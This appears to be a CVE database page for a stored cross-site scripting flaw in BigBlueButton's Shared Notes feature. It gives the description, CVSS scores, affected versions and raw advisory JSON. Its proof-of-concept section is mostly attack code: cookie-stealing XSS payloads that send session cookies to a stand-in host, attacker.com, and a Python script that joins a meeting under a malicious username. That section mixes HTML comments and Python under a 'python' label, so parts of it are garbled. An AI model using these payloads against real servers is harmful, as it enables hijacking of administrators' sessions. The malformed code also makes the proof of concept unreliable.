Security Vulnerability Report
中文
CVE-2025-55200 CVSS 7.1 HIGH

CVE-2025-55200

Published: 2025-10-09 19:15:44
Last Modified: 2025-10-20 15:30:19
Source: [email protected]

Description

BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.13, the "Shared Notes" feature contains a Stored Cross-Site Scripting (XSS) vulnerability with the input location being the "Username" field and the output location on the "Shared Notes" page, when a user with a malicious username is editing content. This vulnerability allows a low-privileged user to execute arbitrary JavaScript in the context of higher-privileged users (e.g., Admins) who open the Shared Notes page. Version 3.0.13 fixes the issue.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:* - VULNERABLE
BigBlueButton < 3.0.13
bbb-pads < v1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-55200: BigBlueButton Stored XSS via Username field Vulnerability: Stored XSS in Shared Notes feature Attack Vector: Username field -> Shared Notes page rendering --> <!-- Step 1: Register or join a BigBlueButton meeting with a malicious username --> <!-- The malicious username contains JavaScript payload that will be stored --> <!-- Malicious Username Payload Examples: --> <!-- Payload 1: Simple cookie stealing --> <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script> <!-- Payload 2: Session hijacking via image tag --> <img src=x onerror="new Image().src='http://attacker.com/log?c='+document.cookie"> <!-- Payload 3: SVG-based XSS --> <svg/onload=alert('XSS-'+document.domain)> <!-- Payload 4: Event handler based --> <body onload="fetch('http://attacker.com/exfil',{method:'POST',body:document.cookie})"> <!-- Step 2: Join the meeting and edit the Shared Notes --> <!-- The malicious username will be rendered in the Shared Notes page --> <!-- Step 3: When an admin or privileged user opens the Shared Notes page, --> <!-- the stored XSS payload executes in their browser context --> <!-- Python exploit example to automate registration with malicious username --> import requests TARGET = "https://bbb.example.com" MEETING_ID = "random-meeting-id-12345" ATTACKER_SERVER = "http://attacker.com/steal" # Malicious username with XSS payload malicious_username = f'<img src=x onerror="new Image().src=\'{ATTACKER_SERVER}?c=\'+document.cookie">' # Join meeting API endpoint join_url = f"{TARGET}/bigbluebutton/api/join" params = { 'fullName': malicious_username, 'meetingID': MEETING_ID, 'password': 'attendee-password', 'joinURL': f"{TARGET}/bigbluebutton/api/join", } # Note: Actual API call would require proper checksum from BBB server response = requests.get(join_url, params=params) print(f"Joined meeting with malicious username: {malicious_username}") print("Waiting for admin to open Shared Notes page...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55200", "sourceIdentifier": "[email protected]", "published": "2025-10-09T19:15:43.663", "lastModified": "2025-10-20T15:30:19.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.13, the \"Shared Notes\" feature contains a Stored Cross-Site Scripting (XSS) vulnerability with the input location being the \"Username\" field and the output location on the \"Shared Notes\" page, when a user with a malicious username is editing content. This vulnerability allows a low-privileged user to execute arbitrary JavaScript in the context of higher-privileged users (e.g., Admins) who open the Shared Notes page. Version 3.0.13 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.13", "matchCriteriaId": "0AF3725E-941E-4C75-AA27-20DC97552948"}]}]}], "references": [{"url": "https://github.com/bigbluebutton/bbb-pads/pull/67", "source": "[email protected]", "tags": ["Issue Tracking", "Product"]}, {"url": "https://github.com/bigbluebutton/bbb-pads/releases/tag/v1.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bigbluebutton/bigbluebutton/pull/23693", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-9jv9-cjrm-grj2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.